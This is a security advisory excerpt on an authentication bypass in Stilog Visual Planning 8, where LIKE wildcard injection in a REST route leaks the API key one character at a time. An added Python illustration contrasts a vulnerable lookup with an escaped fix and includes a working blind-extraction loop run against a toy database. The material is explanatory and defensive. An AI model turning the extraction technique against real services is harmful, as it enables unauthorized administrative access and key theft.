An authentication bypass vulnerability was found in Stilog Visual Planning 8. It allows an unauthenticated malicious user to receive an administrative API token.
A wildcard injection inside a prepared SQL statement was found in an undocumented Visual Planning 8 REST API route. The query uses fuzzy matching (the LIKE operator) on user-controlled input, so the LIKE metacharacters in that input are not neutralised by the parameter binding; combined with distinguishable server responses this allows exfiltrating the REST API key one character at a time. If exploited, attackers are able to gain administrative access to the REST ...
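The mechanism described above, as an added illustration that is not part of the advisory or of Visual Planning's code: a parameterised query still lets `%` and `_` act as wildcards when the bound value feeds a LIKE, and a yes/no response is enough of an oracle to recover the matched secret prefix by prefix. The table, column names, key alphabet and lookup functions below are hypothetical stand-ins for the undocumented route; the hardened variant escapes the wildcards and declares the escape character explicitly.

```python
import sqlite3

# Constructed sample data: one REST API key in a hypothetical table.
# Schema, column names and the hex alphabet are assumptions for this example.
SECRET_KEY = "a7f3c9e1"
ALPHABET = "0123456789abcdef"


def make_db():
    """Build an in-memory database holding the constructed key."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE api_keys (id INTEGER PRIMARY KEY, key TEXT NOT NULL)")
    conn.execute("INSERT INTO api_keys (key) VALUES (?)", (SECRET_KEY,))
    conn.commit()
    return conn


def key_exists_vulnerable(conn, user_input):
    """Prepared statement, but the bound value reaches LIKE unescaped, so
    '%' and '_' in user_input act as wildcards. The boolean result models a
    distinguishable response (e.g. 200 vs 404) the caller can observe."""
    row = conn.execute(
        "SELECT 1 FROM api_keys WHERE key LIKE ?", (user_input,)
    ).fetchone()
    return row is not None


def escape_like(value, esc="\\"):
    """Neutralise LIKE metacharacters in a user-controlled value."""
    return (
        value.replace(esc, esc + esc)
        .replace("%", esc + "%")
        .replace("_", esc + "_")
    )


def key_exists_fixed(conn, user_input):
    """Same lookup, hardened: wildcards escaped and ESCAPE clause declared."""
    row = conn.execute(
        "SELECT 1 FROM api_keys WHERE key LIKE ? ESCAPE '\\'",
        (escape_like(user_input),),
    ).fetchone()
    return row is not None


def extract_key(oracle, max_len=64):
    """Recover the key from a boolean LIKE oracle, one character per step.
    Returns the recovered prefix; an empty string means the oracle never
    confirmed any character (the case for the hardened lookup)."""
    prefix = ""
    while len(prefix) < max_len:
        for ch in ALPHABET:
            if oracle(prefix + ch + "%"):
                prefix += ch
                break
        else:
            return prefix  # no candidate matched: nothing more to learn
        if oracle(prefix):  # no trailing wildcard: exact match, key complete
            return prefix
    return prefix


if __name__ == "__main__":
    db = make_db()
    queries = []

    def counting_oracle(pattern):
        queries.append(pattern)
        return key_exists_vulnerable(db, pattern)

    recovered = extract_key(counting_oracle)
    print(f"vulnerable route: recovered {recovered!r} in {len(queries)} queries")
    print(f"hardened route:  recovered {extract_key(lambda p: key_exists_fixed(db, p))!r}")
```

The cost is linear in key length times alphabet size, which is why a single boolean response per request suffices. Note that LIKE comparison is case-insensitive for ASCII in SQLite and collation-dependent elsewhere, so the alphabet an attacker needs (and the fact that the recovered string may differ in case from the stored one) depends on the backing database.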
Full Disclosure mailing list archives
SCHUTZWERK-SA-2023-003: Authentication Bypass in Visual Planning REST API